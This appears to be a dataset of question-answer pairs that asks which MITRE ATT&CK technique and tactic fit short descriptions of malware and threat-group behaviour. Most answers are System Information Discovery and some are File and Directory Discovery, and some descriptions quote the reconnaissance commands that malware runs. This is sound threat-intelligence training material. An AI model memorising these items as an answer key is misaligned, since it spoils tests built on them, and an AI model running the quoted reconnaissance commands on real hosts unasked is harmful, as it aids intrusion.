+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version. OSX_OCEANLOTUS.D has used the ioreg command to gather some of this information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT has the ability to check for blocklisted computer names on infected endpoints.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can collect the computer name from the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus can collect system drive information, the computer name, the size of the disk, OS version, and OS architecture information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can collect computer name, locale information, and information about the OS and architecture.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can gather the victim OS version and whether it is 64 or 32 bit.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE collects general system enumeration data about the infected machine and checks the OS version.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POORAIM can identify system information, including battery status.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect information about the system by running hostname and systeminfo on a victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can gather system information such as computer names.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key has the ability to gather the hostname of the victim machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can report the file system type and disk space of a compromised host to C2.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PinchDuke gathers system configuration information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can retrieve the hostname of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can collect and send OS version and computer name as a part of its C2 beacon.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader has a command to collect victim system information, including the system name and OS version.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to gather information about the compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has collected the Service Pack, language, and region information to send to the C2.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains modules, such as Get-ComputerInfo, for enumerating common system information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has commands to get information about the victim's name, build, version, serial number, and memory usage.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has collected system information on the infected host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can grab a system’s information including the OS version, architecture, etc.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can collect system information including the OS version and domain on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can gather system information from the victim’s machine including the OS type.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA gathers information about the OS architecture, OS name, and OS version/Service pack.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can gather system information from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can gather the hostname and the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can obtain the computer name, OS version, and default language identifier.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT collects the CPU information, OS information, and system language.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has the ability to identify the Windows version on the compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro executes a set of commands to collect device information, including `uname`. Another example is the `cat /etc/*release | uniq` command used to collect the current OS distribution.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can use `GetNativeSystemInfo` and `GetLogicalDrives` to enumerate system processors and logical drives.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT gathers the OS version, logical drives information, processor information, and volume information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The initial beacon packet for S-Type contains the operating system version and file system of the victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to identify the OS version, OS bit information and computer name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHUTTERSPEED can collect system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can collect information related to a compromised host, including OS version and a list of drives.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWDRIFT collects and sends system information to its C2.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used the systeminfo command on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SOUNDBITE is capable of gathering system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE can gather the computer name of an infected host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected hostname and OS version.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has the ability to collect information such as computer name, computer manufacturer, BIOS, operating system, and firmware, including through the use of `systeminfo.exe`.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYSCON has the ability to use Systeminfo to identify system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can identify the OS version, CPU, and other details from a victim's machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to collect the computer name, CPU manufacturer name, and C:\ drive serial number from a compromised machine. Sardonic also has the ability to execute the `ver` and `systeminfo` commands.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper will attempt to enumerate Windows version and system architecture.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can collect the GUID of a targeted machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can use a plugin to enumerate system drives.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has checked the system settings to see if Arabic is the configured language.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter gathered the operating system name and specific Windows version of an infected machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can collect the computer name of a targeted system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has the ability to query `Win32_ComputerSystem` for system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has the ability to enumerate system information including the victim computer name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can enumerate the host name and OS version on a target system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can execute getinfo to enumerate the computer name and OS version of a compromised system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark can collect the hostname, keyboard layout, and language from the system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses the cat /proc/cpuinfo | grep -c “cpu family” 2>&1 command to gather system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette can identify the system name of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has gathered victim computer information and configurations.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SslMM sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has the capability to discover the system OS, Windows version, architecture and environment.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx has the ability to enumerate system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can identify the hard disk volume serial number on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet collects system information including computer and domain names, OS version, and S7P paths.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sys10 collects the computer name, OS versioning information, and OS install date and sends the information to the C2.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can collect a system's architecture, operating system version, hostname, and drive information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Systeminfo can be used to gather information about the operating system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can use DriveList to retrieve drive information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TURNEDUP is capable of gathering system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can gather the disk volume information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to identify hardware information, the computer name, and OS information on an infected host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can collect system profile information from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma can use `GetlogicalDrives` to get a bitmask of all drives available on a compromised system. It can also use `GetDriveType` to determine if a new drive is a CD-ROM drive.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can retrieve system information including OS version, memory usage, local hostname, and system adapter information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT has the capability to gather the system’s hostname and OS version.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger can obtain information about the victim computer name, physical memory, country, and date.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has the ability to gather basic system information and run the POSIX API `gethostbyname`.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used Systeminfo to gather system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN collects the OS name, machine name, and architecture information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can determine the Windows version and computer name on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINDSHIELD can gather the victim computer name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can gather information about the host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can collect compromised host information, including OS version, PC name, RAM size, and CPU details.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can identify the computer name of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate has the ability to enumerate fixed logical drives on a targeted system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can retrieve the following information from an infected machine: OS, architecture, computer name, OS build version, environment variables, and storage drives.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the getInstalledAPP function to run ls -la /Applications to gather what applications are installed.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET identifies the macOS version and uses ioreg to determine serial number.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: YAHOYAH checks for the system’s Windows OS version and hostname.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has the ability to enumerate system information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy collects the OS version, computer name and serial number for the storage volume C:\. Zebrocy also runs the systeminfo command to gather system information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox can enumerate attached drives.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has collected the host name and operating system product name from a compromised machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has the ability to send system volume information to C2.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: cmd can be used to find information about the operating system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to identify the system volume information of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: dsquery has the ability to enumerate various information, such as the operating system and host name, for systems within a domain.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has gathered system architecture, processor, OS configuration, and installed hardware information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner can gather the device serial number and has checked to ensure there is enough disk space using the Unix utility `df`.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can collect the computer name from a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT enumerates the victim operating system and computer name during the initial infection.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command systeminfo.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell can obtain the victim PC name and OS version.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and browse the victim file system.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used `dir c:\\` to search for files.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used a malicious DLL to search for files with specific keywords.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors gathered a recursive directory listing to find files and directories of interest.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 obtained information about the configured Exchange virtual directory using `Get-WebServicesVirtualDirectory`.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 can list files information for specific directories.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that looks for files and directories on the local file system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor possesses the capability to list files and directories on a machine.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 have enumerated files and directories, or searched in specific locations within a compromised host.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used tools with the ability to search for files on a compromised host.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.","Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
